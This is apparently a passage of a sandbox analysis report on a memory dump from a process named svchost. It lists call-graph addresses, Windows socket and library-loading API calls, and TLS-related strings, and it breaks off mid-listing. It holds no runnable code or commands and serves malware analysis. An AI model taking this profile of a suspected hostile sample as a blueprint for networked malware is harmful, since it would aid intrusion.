173d0164a70 14 API calls 86298->86307 86299 173d0152c74 _errno 86299->86288 86300 173d0152cc2 86303 173d0152cee 86300->86303 86346 173d01878b0 free 86303->86346 86304 173d0152ce1 free 86304->86303 86306 173d0152cf9 closesocket 86306->86290 86307->86262 86309 173d019b43f htonl setsockopt 86308->86309 86310 173d019b43a 86308->86310 86311 173d019b661 closesocket closesocket closesocket 86309->86311 86312 173d019b4c4 bind 86309->86312 86313 173d01b9e10 8 API calls 86310->86313 86311->86310 86312->86311 86314 173d019b4e0 getsockname 86312->86314 86315 173d0152b4b 86313->86315 86314->86311 86316 173d019b4fa 86314->86316 86315->86281 86315->86282 86316->86311 86317 173d019b504 listen 86316->86317 86317->86311 86318 173d019b51b socket 86317->86318 86318->86311 86319 173d019b538 connect 86318->86319 86319->86311 86320 173d019b554 86319->86320 86347 173d018c2d0 ioctlsocket 86320->86347 86322 173d019b561 86322->86311 86323 173d0192110 17 API calls 86322->86323 86324 173d019b588 accept 86323->86324 86324->86311 86325 173d019b5a4 86324->86325 86326 173d01a3b60 2 API calls 86325->86326 86327 173d019b5ad 86326->86327 86327->86311 86328 173d019b5cf send 86327->86328 86331 173d019b5e2 86328->86331 86329 173d0192110 17 API calls 86330 173d019b605 recv 86329->86330 86330->86331 86332 173d019b625 WSAGetLastError 86330->86332 86331->86311 86331->86329 86334 173d019b6cf 86331->86334 86333 173d01a3b60 2 API calls 86332->86333 86333->86331 86334->86311 86335 173d019b717 closesocket 86334->86335 86348 173d018c2d0 ioctlsocket 86334->86348 86335->86310 86337 173d019b6f9 86337->86311 86349 173d018c2d0 ioctlsocket 86337->86349 86339 173d019b70f 86339->86311 86339->86335 86341 173d0152c6c 86340->86341 86341->86298 86341->86299 86342->86280 86343->86300 86344->86296 86345->86304 86346->86306 86347->86322 86348->86337 86349->86339 86350 173d0155ea0 86351 173d0155ede 86350->86351 86369 173d0155ee3 86350->86369 86352 173d0156062 86351->86352 86351->86369 86390 173d01579f0 86351->86390 86355 173d0192690 19 API calls 86352->86355 86354 173d01b9e10 8 API calls 86357 173d015613c 86354->86357 86358 173d015607b 86355->86358 86359 173d0156098 86358->86359 86360 173d0156081 86358->86360 86364 173d01560d0 86359->86364 86366 173d01560aa 86359->86366 86361 173d0164bb0 14 API calls 86360->86361 86361->86369 86362 173d0155fa9 86363 173d015602d 86362->86363 86362->86369 86459 173d0157f90 34 API calls 86362->86459 86363->86369 86373 173d0158110 2 API calls 86363->86373 86454 173d01582d0 SleepEx getsockopt 86364->86454 86366->86362 86376 173d01582d0 3 API calls 86366->86376 86367 173d0155f36 connect 86368 173d0155f4e WSAGetLastError 86367->86368 86457 173d0157f90 34 API calls 86368->86457 86369->86354 86371 173d0155fc7 WSASetLastError 86460 173d019ec40 21 API calls 86371->86460 86373->86369 86376->86362 86377 173d0155f62 86380 173d0164bb0 14 API calls 86377->86380 86378 173d01560eb 86381 173d01a3b60 2 API calls 86378->86381 86379 173d0155ff5 86382 173d0164b60 18 API calls 86379->86382 86383 173d0155f85 86380->86383 86384 173d01560f5 86381->86384 86382->86363 86383->86352 86385 173d0155f97 86383->86385 86461 173d0157f90 34 API calls 86384->86461 86458 173d01581a0 31 API calls 86385->86458 86387 173d015610a 86389 173d0164bb0 14 API calls 86387->86389 86389->86369 86391 173d01a3b60 2 API calls 86390->86391 86392 173d0157a2e 86391->86392 86462 173d0158230 86392->86462 86394 173d0157a4f 86447 173d0157ac1 86394->86447 86465 173d015c990 11 API calls 86394->86465 86396 173d0157a73 86399 173d0157a7b _errno _errno _errno 86396->86399 86400 173d0157b2e 86396->86400 86397 173d0158110 2 API calls 86453 173d0157ae1 86397->86453 86398 173d0164bb0 14 API calls 86401 173d0157b05 86398->86401 86466 173d019ec40 21 API calls 86399->86466 86403 173d0157b37 setsockopt 86400->86403 86404 173d0157b65 86400->86404 86402 173d01b9e10 8 API calls 86401->86402 86406 173d0155f04 86402->86406 86403->86404 86408 173d0164b60 18 API calls 86404->86408 86406->86362 86406->86367 86406->86368 86406->86369 86407 173d0157aac 86467 173d0164a70 14 API calls 86407->86467 86410 173d0157b82 86408->86410 86411 173d0157bf9 86410->86411 86412 173d0157ba2 setsockopt 86410->86412 86414 173d01ac700 21 API calls 86411->86414 86418 173d0157c40 86411->86418 86412->86411 86413 173d0157bcf WSAGetLastError 86412->86413 86468 173d019ec40 21 API calls 86413->86468 86414->86418 86415 173d0157c44 86422 173d0157cc9 setsockopt 86415->86422 86427 173d0157df8 86415->86427 86416 173d0157c61 getsockopt 86419 173d0157c88 86416->86419 86420 173d0157c92 setsockopt 86416->86420 86418->86415 86418->86416 86419->86415 86419->86420 86420->86415 86421 173d0157be7 86423 173d0164b60 18 API calls 86421->86423 86424 173d0157cf9 WSAGetLastError 86422->86424 86425 173d0157d0b 86422->86425 86423->86411 86426 173d0157dea 86424->86426 86428 173d0157d16 setsockopt 86425->86428 86430 173d0164b60 18 API calls 86426->86430 86429 173d0157e8d 86427->86429 86431 173d0157e54 86427->86431 86427->86447 86432 173d0157d5a 86428->86432 86433 173d0157d3f WSAGetLastError 86428->86433 86470 173d018c2d0 ioctlsocket 86429->86470 86430->86427 86469 173d0157410 360 API calls 86431->86469 86439 173d0157d65 setsockopt 86432->86439 86436 173d0164b60 18 API calls 86433->86436 86436->86432 86437 173d0157e9a 86440 173d0157eb5 86437->86440 86441 173d0157e9e WSAGetLastError 86437->86441 86438 173d0157e74 86438->86429 86442 173d0157e7a 86438->86442 86443 173d0157da9 86439->86443 86444 173d0157d8e WSAGetLastError 86439->86444 86445 173d0157ecc 86440->86445 86440->86447 86441->86447 86442->86447 86448 173d0157db4 setsockopt 86443->86448 86446 173d0164b60 18 API calls 86444->86446 86445->86453 86471 173d0157f90 34 API calls 86445->86471 86446->86443 86447->86397 86447->86453 86448->86427 86450 173d0157ddd WSAGetLastError 86448->86450 86450->86426 86451 173d0157ee0 86452 173d01a3b60 2 API calls 86451->86452 86452->86453 86453->86398 86455 173d0158321 WSAGetLastError 86454->86455 86456 173d01560e3 86454->86456 86455->86456 86456->86362 86456->86378 86457->86377 86458->86362 86459->86371 86460->86379 86461->86387 86463 173d015827a socket 86462->86463 86464 173d0158252 86462->86464 86463->86464 86464->86394 86465->86396 86466->86407 86467->86447 86468->86421 86469->86438 86470->86437 86471->86451 86472 173d01749e0 86477 173d0174a30 86472->86477 86473 173d0174a87 86521 173d01750c0 86473->86521 86476 173d0174a73 86542 173d0164a70 14 API calls 86476->86542 86477->86473 86477->86476 86479 173d0164b60 18 API calls 86488 173d0174ade 86479->86488 86480 173d0174a82 86482 173d01b9e10 8 API calls 86480->86482 86481 173d0174b49 inet_pton 86483 173d0174b67 inet_pton 86481->86483 86484 173d0174b61 86481->86484 86485 173d0174f23 86482->86485 86483->86484 86486 173d0174c0d 86483->86486 86543 173d01618a0 10 API calls 86484->86543 86491 173d01743b0 2 API calls 86486->86491 86494 173d0174c2e 86486->86494 86488->86480 86488->86481 86489 173d0174b94 86489->86480 86490 173d0174ba0 86489->86490 86544 173d0173e50 29 API calls 86489->86544 86490->86489 86491->86494 86492 173d0174cfb 86492->86492 86495 173d0174d0d htons inet_pton 86492->86495 86494->86480 86494->86492 86497 173d0174ca0 86494->86497 86498 173d0174cd6 86495->86498 86499 173d0174d4e calloc 86495->86499 86496 173d0174bd8 86500 173d0174ef3 86496->86500 86501 173d0174c00 86496->86501 86502 173d0174ccb 86497->86502 86505 173d0174cae 86497->86505 86498->86480 86498->86490 86503 173d0174ea3 86498->86503 86512 173d0174d73 86499->86512 86519 173d0174cc0 86499->86519 86550 173d01752d0 22 API calls SimpleString::operator= 86500->86550 86545 173d01616c0 free 86501->86545 86533 173d0175510 86502->86533 86503->86480 86510 173d0174ec2 86503->86510 86511 173d0174ebb 86503->86511 86546 173d01663d0 288 API calls 86505->86546 86508 173d0174c08 86508->86480 86548 173d01525a0 47 API calls 86510->86548 86547 173d01666b0 274 API calls 86511->86547 86512->86512 86515 173d0174dd9 calloc 86512->86515 86518 173d0174df4 htons inet_pton 86515->86518 86515->86519 86516 173d0174ec0 86517 173d0174ec7 86516->86517 86517->86480 86549 173d01752d0 22 API calls SimpleString::operator= 86517->86549 86518->86519 86519->86498 86519->86519 86522 173d01750f0 86521->86522 86523 173d0184eb0 8 API calls 86522->86523 86526 173d017512e 86523->86526 86524 173d01751bd _time64 86528 173d01751ce 86524->86528 86525 173d01b9e10 8 API calls 86527 173d0174ac3 86525->86527 86529 173d0184eb0 8 API calls 86526->86529 86530 173d017518d 86526->86530 86532 173d01751ec 86526->86532 86527->86479 86527->86488 86531 173d0164b60 18 API calls 86528->86531 86528->86532 86529->86530 86530->86524 86530->86528 86530->86532 86531->86532 86532->86525 86534 173d01743b0 86533->86534 86535 173d017551d 86533->86535 86536 173d0174400 socket 86534->86536 86537 173d01743be 86534->86537 86535->86498 86538 173d0174419 86536->86538 86539 173d0174426 closesocket 86536->86539 86540 173d01743d5 86537->86540 86541 173d01743b0 2 API calls 86537->86541 86538->86498 86539->86498 86540->86498 86541->86540 86542->86480 86543->86489 86544->86496 86545->86508 86546->86519 86547->86516 86548->86517 86549->86480 86550->86480 86551 173d0168ea0 AcquireSRWLockExclusive 86554 173d0169070 86551->86554 86553 173d0168ebe ReleaseSRWLockExclusive 86555 173d0169092 86554->86555 86557 173d0169103 86554->86557 86556 173d0169096 calloc 86555->86556 86558 173d01690ea 86555->86558 86556->86558 86557->86553 86558->86557 86560 173d019fe30 86558->86560 86561 173d019fe4e WSAStartup 86560->86561 86562 173d019fe96 86560->86562 86564 173d019fe62 86561->86564 86565 173d019fe79 86561->86565 86563 173d0164840 32 API calls 86562->86563 86566 173d019fe9b 86563->86566 86564->86562 86567 173d019fe73 WSACleanup 86564->86567 86568 173d01b9e10 8 API calls 86565->86568 86570 173d01a00ab 86566->86570 86571 173d019fea3 GetModuleHandleW 86566->86571 86567->86565 86569 173d019fe8e 86568->86569 86569->86557 86574 173d01b9e10 8 API calls 86570->86574 86572 173d019fed6 GetProcAddress wcspbrk 86571->86572 86573 173d019feca 86571->86573 86575 173d019ff3d 86572->86575 86576 173d019ff15 86572->86576 86578 173d01ac700 21 API calls 86573->86578 86577 173d01a00bb 86574->86577 86581 173d019ff6c GetSystemDirectoryW 86575->86581 86582 173d019ff42 GetProcAddress 86575->86582 86579 173d019ff1d 86576->86579 86580 173d019ff2f LoadLibraryW 86576->86580 86577->86557 86584 173d01a0083 QueryPerformanceFrequency 86578->86584 86579->86573 86588 173d01a004a GetProcAddress 86579->86588 86580->86579 86581->86579 86583 173d019ff89 malloc 86581->86583 86582->86581 86585 173d019ff57 LoadLibraryExW 86582->86585 86586 173d01a001d free 86583->86586 86587 173d019ffa2 GetSystemDirectoryW 86583->86587 86584->86570 86585->86579 86586->86579 86587->86586 86590 173d019ffb2 86587->86590 86588->86573 86589 173d01a005f 86588->86589 86589->86573 86591 173d01a0014 LoadLibraryW 86590->86591 86592 173d01a0008 86590->86592 86591->86592 86592->86586 86593 173d01689e0 86594 173d01689ef 86593->86594 86595 173d01689fb 86593->86595 86596 173d0168a33 86595->86596 86597 173d0168a1b 86595->86597 86599 173d0168a59 86596->86599 86614 173d0187a80 calloc 86596->86614 86663 173d0164a70 14 API calls 86597->86663 86602 173d0168a61 86599->86602 86632 173d01885f0 86599->86632 86600 173d0168a27 86604 173d0168ab7 86605 173d0168abd 86604->86605 86611 173d0168ae8 86604->86611 86664 173d0188810 261 API calls 86605->86664 86607 173d0168ac5 86608 173d0168b42 86665 173d0189180 261 API calls 86608->86665 86611->86608 86641 173d0189150 86611->86641 86644 173d0188eb0 86611->86644 86612 173d0168b62 86615 173d0187aad 86614->86615 86616 173d0187abd 86614->86616 86615->86599 86666 173d015aa90 86616->86666 86618 173d0187b4e 86622 173d0187bb0 86618->86622 86625 173d0187b7e WSACreateEvent 86618->86625 86619 173d0187be8 86671 173d0172f80 free 86619->86671 86622->86619 86670 173d0172f80 free 86622->86670 86623 173d0187bf4 86672 173d0172f80 free 86623->86672 86625->86622 86627 173d0187bab 86625->86627 86626 173d0187c00 86673 173d0172f80 free 86626->86673 86627->86599 86629 173d0187c0c 86674 173d015a2c0 261 API calls 86629->86674 86631 173d0187c18 free 86631->86627 86633 173d0188609 86632->86633 86634 173d0188634 86632->86634 86633->86634 86636 173d018869b 86633->86636 86706 173d0188810 261 API calls 86633->86706 86634->86604 86707 173d01874f0 20 API calls 86636->86707 86638 173d01886dc 86708 173d0188370 10 API calls 86638->86708 86640 173d01886e4 86640->86604 86709 173d018b4e0 86641->86709 86645 173d01a3b60 2 API calls 86644->86645 86650 173d0188ee7 86645->86650 86646 173d01b9e10 8 API calls 86647 173d0189135 86646->86647 86647->86611 86648 173d0188f70 86774 173d015ab50 80 API calls 86648->86774 86650->86648 86656 173d0188f0c 86650->86656 86755 173d0189e10 86650->86755 86653 173d01890f4 86653->86656 86778 173d0188370 10 API calls 86653->86778 86655 173d015cfb0 10 API calls 86661 173d0188f78 86655->86661 86656->86646 86658 173d0164a70 14 API calls 86658->86661 86659 173d0164b60 18 API calls 86659->86661 86660 173d01898c0 261 API calls 86660->86661 86661->86653 86661->86655 86661->86658 86661->86659 86661->86660 86775 173d019dda0 8 API calls 86661->86775 86776 173d0189840 20 API calls 86661->86776 86777 173d0188480 8 API calls 86661->86777 86663->86600 86664->86607 86665->86612 86667 173d015aad4 86666->86667 86668 173d015aae9 86667->86668 86675 173d01687f0 AcquireSRWLockExclusive 86667->86675 86668->86618 86670->86622 86671->86623 86672->86626 86673->86629 86674->86631 86676 173d016880a 86675->86676 86677 173d016882e ReleaseSRWLockExclusive 86675->86677 86678 173d0169070 48 API calls 86676->86678 86683 173d01a62c0 calloc 86677->86683 86680 173d0168816 86678->86680 86680->86677 86682 173d016881a ReleaseSRWLockExclusive 86680->86682 86681 173d0168845 86681->86668 86682->86668 86684 173d01a62e6 86683->86684 86685 173d01a62f7 86683->86685 86684->86681 86700 173d0152560 calloc 86685->86700 86687 173d01a6322 86688 173d01a6347 __acrt_iob_func __acrt_iob_func __acrt_iob_func 86687->86688 86689 173d01a6328 86687->86689 86702 173d0182da0 memset 86688->86702 86701 173d01900f0 6 API calls 86689->86701 86693 173d01a6438 86703 173d01b49f0 realloc GetEnvironmentVariableA realloc free free 86693->86703 86695 173d01a6473 86696 173d01a647d 86695->86696 86704 173d01b49f0 realloc GetEnvironmentVariableA realloc free free 86695->86704 86705 173d01726c0 free free free free free 86696->86705 86699 173d01a6548 86699->86681 86700->86687 86702->86693 86703->86695 86704->86696 86705->86699 86706->86636 86707->86638 86708->86640 86710 173d018b54d 86709->86710 86713 173d018b538 86709->86713 86711 173d01b9e10 8 API calls 86710->86711 86712 173d018916d 86711->86712 86712->86611 86713->86710 86714 173d018b5e2 86713->86714 86726 173d018b5a3 86713->86726 86749 173d0159d10 12 API calls 86714->86749 86716 173d018b5f4 86717 173d018b751 86716->86717 86725 173d018b67d 86716->86725 86728 173d018b617 86716->86728 86754 173d0192640 free 86717->86754 86720 173d018b75c 86751 173d018b3c0 10 API calls 86720->86751 86724 173d018b6bc getsockopt 86724->86725 86725->86720 86725->86724 86729 173d018b713 WSAEventSelect 86725->86729 86730 173d018b6f9 send 86725->86730 86726->86714 86726->86717 86747 173d0189ba0 14 API calls 86726->86747 86748 173d01924d0 calloc memmove free 86726->86748 86727 173d018b76d 86731 173d0192110 17 API calls 86727->86731 86732 173d018b795 86727->86732 86728->86717 86728->86725 86750 173d0192630 calloc memmove free 86728->86750 86729->86717 86729->86725 86730->86725 86731->86732 86732->86717 86733 173d018b7a0 WSAWaitForMultipleEvents 86732->86733 86736 173d018b7c5 86732->86736 86738 173d018b9e5 86732->86738 86733->86736 86734 173d018b9c6 WSAResetEvent 86734->86738 86735 173d018b7f0 WSAEnumNetworkEvents 86735->86736 86737 173d018b8b2 WSAEventSelect 86735->86737 86736->86735 86736->86737 86740 173d018b861 WSAEventSelect 86736->86740 86746 173d018b917 86736->86746 86737->86736 86738->86717 86752 173d018b3c0 10 API calls 86738->86752 86740->86736 86741 173d018ba29 86741->86717 86742 173d018ba43 86741->86742 86753 173d01927f0 WSASetLastError Sleep 86742->86753 86743 173d018b960 WSAEnumNetworkEvents 86745 173d018b98b WSAEventSelect 86743->86745 86743->86746 86745->86743 86745->86746 86746->86734 86746->86743 86746->86745 86747->86726 86748->86726 86749->86716 86750->86728 86751->86727 86752->86741 86753->86717 86754->86710 86756 173d0189e50 86755->86756 86757 173d018b186 86755->86757 86756->86757 86758 173d01898c0 261 API calls 86756->86758 86773 173d0189ed9 86756->86773 86757->86650 86759 173d0189e86 86758->86759 86763 173d0189eaf 86759->86763 86759->86773 86779 173d018ba90 free free 86759->86779 86760 173d015cfb0 10 API calls 86760->86773 86780 173d0187540 18 API calls 86763->86780 86764 173d0189840 20 API calls 86764->86773 86765 173d0164a70 14 API calls 86765->86773 86766 173d01898c0 261 API calls 86766->86773 86768 173d018b0e4 86768->86650 86770 173d018ba90 free free 86770->86773 86772 173d015a330 85 API calls 86772->86773 86773->86760 86773->86764 86773->86765 86773->86766 86773->86768 86773->86770 86773->86772 86781 173d018f410 QueryPerformanceCounter GetTickCount 86773->86781 86782 173d0187540 18 API calls 86773->86782 86783 173d018f2d0 17 API calls 86773->86783 86774->86661 86775->86661 86776->86661 86777->86661 86778->86656 86779->86763 86780->86773 86781->86773 86782->86773 86783->86773 86784 173cfc11fb0 86789 173cfc51b3c 86784->86789 86787 173cfc11fda 86790 173cfc51b56 malloc 86789->86790 86791 173cfc51b47 86790->86791 86792 173cfc11fc3 86790->86792 86791->86790 86793 173cfc51b66 86791->86793 86792->86787 86798 173cfc04490 86792->86798 86794 173cfc51b71 86793->86794 86804 173cfc39d20 _CxxThrowException Concurrency::cancel_current_task 86793->86804 86805 173cfc06a78 _CxxThrowException std::bad_alloc::bad_alloc 86794->86805 86799 173cfc044de 86798->86799 86806 173cfc04f40 86799->86806 86807 173cfc044ee 86806->86807 86808 173cfc04f5d 86806->86808 86813 173cfc0f6c0 86807->86813 86809 173cfc04f62 free 86808->86809 86810 173cfc04f68 86808->86810 86809->86810 86810->86807 86811 173cfc04f81 malloc 86810->86811 86811->86807 86812 173cfc04f96 memmove 86811->86812 86812->86807 86814 173cfc0f714 86813->86814 86815 173cfc0f6e1 86813->86815 86817 173cfc36700 tidy_global _lock_locales 86814->86817 86831 173cfc045f0 86815->86831 86819 173cfc0f723 86817->86819 86820 173cfc0f72d malloc 86819->86820 86821 173cfc0f770 86819->86821 86823 173cfc0f792 86820->86823 86826 173cfc0f740 86820->86826 86943 173cfc367a0 _unlock_locales 86821->86943 86944 173cfc39d20 _CxxThrowException Concurrency::cancel_current_task 86823->86944 86826->86821 86827 173cfc044fa 86827->86787 86832 173cfc36700 tidy_global _lock_locales 86831->86832 86833 173cfc0460c 86832->86833 86834 173cfc0465a 86833->86834 86835 173cfc04640 86833->86835 86950 173cfc39e50 __std_exception_copy _CxxThrowException 86834->86950 86945 173cfc11f20 setlocale 86835->86945 86839 173cfc04666 86943->86827 86946 173cfc04f40 std::locale::_Locimp::_Locimp 3 API calls 86945->86946 86947 173cfc11f54 86946->86947 86948 173cfc11f67 86947->86948 86949 173cfc11f59 setlocale 86947->86949 86949->86948 86950->86839

                                                                Executed Functions

                                                                Function 00000173D01B04A6 Relevance: 177.7, APIs: 57, Strings: 44, Instructions: 927COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcfree
                                                                • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                                                • API String ID: 3799942571-230586194
                                                                • Opcode ID: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                • Instruction ID: 0567e7d9c4d39772a308cfc91562ba82225d042035ea54c94e5c4c716df1d71f
                                                                • Opcode Fuzzy Hash: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                • Instruction Fuzzy Hash: C1929139608B4185FB328FA5E8903EDA7B0B746FD8F844115DA6E47BA5FB78C644E700
                                                                Function 00000173D01A6B50 Relevance: 46.0, APIs: 14, Strings: 12, Instructions: 539COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 371 173d01a6b50-173d01a6b91 372 173d01a6b9d-173d01a6ba8 call 173d01a6910 371->372 373 173d01a6b93-173d01a6b98 371->373 378 173d01a6bb4-173d01a6bc6 call 173d01a8670 372->378 379 173d01a6baa-173d01a6baf 372->379 374 173d01a74bf 373->374 377 173d01a74c1-173d01a74e5 call 173d01b9e10 374->377 378->374 384 173d01a6bcc-173d01a6bd6 378->384 379->374 385 173d01a6bea-173d01a6bf4 384->385 386 173d01a6bd8-173d01a6be8 _strdup 384->386 387 173d01a6bf6-173d01a6c06 _strdup 385->387 388 173d01a6c08-173d01a6c12 385->388 386->379 386->385 387->379 387->388 389 173d01a6c33-173d01a6c42 call 173d01a74f0 388->389 390 173d01a6c14-173d01a6c24 _strdup 388->390 389->374 394 173d01a6c48-173d01a6c56 389->394 390->379 391 173d01a6c26-173d01a6c2d 390->391 391->389 395 173d01a6c68-173d01a6c72 394->395 396 173d01a6c58-173d01a6c5f 394->396 398 173d01a6cbd-173d01a6ccc call 173d01a7960 395->398 399 173d01a6c74-173d01a6c7b 395->399 396->395 397 173d01a6c61 396->397 397->395 398->374 404 173d01a6cd2-173d01a6cee 398->404 399->398 400 173d01a6c7d-173d01a6cb7 call 173d0184eb0 call 173d01aa7c0 399->400 400->379 400->398 406 173d01a6cf0-173d01a6cf7 404->406 407 173d01a6cf9-173d01a6d00 404->407 406->407 409 173d01a6d03-173d01a6d0a 406->409 407->409 411 173d01a6d0c-173d01a6d1c _strdup 409->411 412 173d01a6d22-173d01a6d2e 409->412 411->379 411->412 413 173d01a6d30-173d01a6d43 _strdup 412->413 414 173d01a6d46-173d01a6d48 412->414 413->414 414->374 415 173d01a6d4e-173d01a6d64 call 173d01a7e20 414->415 415->374 418 173d01a6d6a-173d01a6d71 415->418 419 173d01a6d73-173d01a6d81 call 173d017ec10 418->419 420 173d01a6d87-173d01a6d8e 418->420 419->377 419->420 421 173d01a6d90-173d01a6d9e call 173d017ec10 420->421 422 173d01a6da4-173d01a6dab 420->422 421->377 421->422 425 173d01a6dad-173d01a6dbb call 173d017ec10 422->425 426 173d01a6de5-173d01a6dee 422->426 425->377 438 173d01a6dc1-173d01a6dc8 425->438 430 173d01a6df0-173d01a6dfc 426->430 431 173d01a6e07-173d01a6e0e 426->431 430->431 435 173d01a6dfe-173d01a6e05 430->435 432 173d01a6e10-173d01a6e12 431->432 433 173d01a6e14-173d01a6e1b 431->433 432->433 436 173d01a6e24-173d01a6e32 432->436 433->436 437 173d01a6e1d 433->437 435->431 439 173d01a6e4e-173d01a6e58 436->439 440 173d01a6e34-173d01a6e41 436->440 437->436 438->426 441 173d01a6dca-173d01a6ddc call 173d019e230 438->441 442 173d01a6e5a-173d01a6e61 439->442 443 173d01a6e68-173d01a6e6f 439->443 440->374 449 173d01a6e47 440->449 441->426 450 173d01a6dde 441->450 442->443 447 173d01a6e71-173d01a6e78 443->447 448 173d01a6e83-173d01a6e91 443->448 447->448 451 173d01a6e7a-173d01a6e81 447->451 452 173d01a6e9c 448->452 453 173d01a6e93-173d01a6e9a 448->453 449->439 450->426 454 173d01a6ea0-173d01a6ebc call 173d0184d90 451->454 452->454 453->454 457 173d01a6ebe-173d01a6ec0 454->457 458 173d01a6ec5-173d01a6ecc 454->458 457->374 459 173d01a6ed0-173d01a6ed7 458->459 459->459 460 173d01a6ed9-173d01a6ef7 call 173d019e150 459->460 463 173d01a6efd-173d01a6f36 460->463 464 173d01a6f92-173d01a6fd5 call 173d01b4ff0 460->464 469 173d01a6f82-173d01a6f8d call 173d01a5fc0 463->469 470 173d01a6f38-173d01a6f52 call 173d0187450 call 173d0159b70 463->470 464->374 468 173d01a6fdb-173d01a6fea call 173d015ad70 464->468 478 173d01a6fec-173d01a6ff2 468->478 479 173d01a6ff8-173d01a7001 468->479 469->374 470->374 484 173d01a6f58-173d01a6f67 call 173d01a9050 470->484 478->479 481 173d01a7303 478->481 482 173d01a7305-173d01a7316 479->482 483 173d01a7007-173d01a702d 479->483 481->482 487 173d01a7328-173d01a732b 482->487 488 173d01a7318-173d01a731f 482->488 485 173d01a705e 483->485 486 173d01a702f-173d01a7036 483->486 504 173d01a6f7d call 173d01a4eb0 484->504 505 173d01a6f69-173d01a6f78 484->505 495 173d01a7060-173d01a706b 485->495 490 173d01a7041-173d01a704f call 173d0188330 486->490 491 173d01a7038-173d01a703f 486->491 493 173d01a749d-173d01a74ba call 173d0164b60 call 173d01a5720 487->493 494 173d01a7331-173d01a733f call 173d0159ee0 487->494 488->487 492 173d01a7321 488->492 490->485 515 173d01a7051-173d01a7058 490->515 491->485 491->490 492->487 493->374 509 173d01a748e-173d01a7498 call 173d0164b60 494->509 510 173d01a7345-173d01a7348 494->510 500 173d01a706d-173d01a707b 495->500 501 173d01a7081 495->501 500->501 502 173d01a707d-173d01a707f 500->502 503 173d01a7083-173d01a708e 501->503 502->503 511 173d01a70ad 503->511 512 173d01a7090-173d01a7097 503->512 504->469 505->374 509->493 516 173d01a737c-173d01a738b call 173d01b4ee0 510->516 517 173d01a734a-173d01a7376 call 173d0164b60 510->517 520 173d01a70af-173d01a70ed call 173d015a7b0 511->520 512->511 519 173d01a7099-173d01a70a7 512->519 515->485 523 173d01a705a-173d01a705c 515->523 516->374 531 173d01a7391-173d01a73ab call 173d0187450 call 173d0159b70 516->531 517->493 517->516 519->511 526 173d01a70a9-173d01a70ab 519->526 520->482 532 173d01a70f3-173d01a70fa 520->532 523->495 526->520 531->374 545 173d01a73b1-173d01a73b8 531->545 534 173d01a714e-173d01a715d 532->534 535 173d01a70fc-173d01a7147 free * 2 532->535 537 173d01a7163-173d01a7200 free * 4 534->537 538 173d01a7207-173d01a72b5 free * 3 call 173d01a5720 534->538 535->534 537->538 543 173d01a72c0-173d01a72c7 538->543 544 173d01a72b7-173d01a72be 538->544 547 173d01a72d2 543->547 548 173d01a72c9-173d01a72d0 543->548 546 173d01a72d6-173d01a72fe call 173d0164b60 544->546 549 173d01a73de-173d01a73e5 545->549 550 173d01a73ba-173d01a73c0 545->550 551 173d01a740c-173d01a7423 call 173d01a5fc0 call 173d01a9050 546->551 547->546 548->546 549->551 552 173d01a73e7-173d01a73ee 549->552 550->549 554 173d01a73c2-173d01a73d7 call 173d0164b60 550->554 551->374 565 173d01a7429-173d01a742f 551->565 552->551 555 173d01a73f0-173d01a7405 call 173d0164b60 552->555 554->549 555->551 566 173d01a7431-173d01a7435 565->566 567 173d01a7437-173d01a7440 call 173d01a8e00 565->567 568 173d01a744b-173d01a748c call 173d01592b0 566->568 571 173d01a7445-173d01a7449 567->571 568->374 571->374 571->568
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
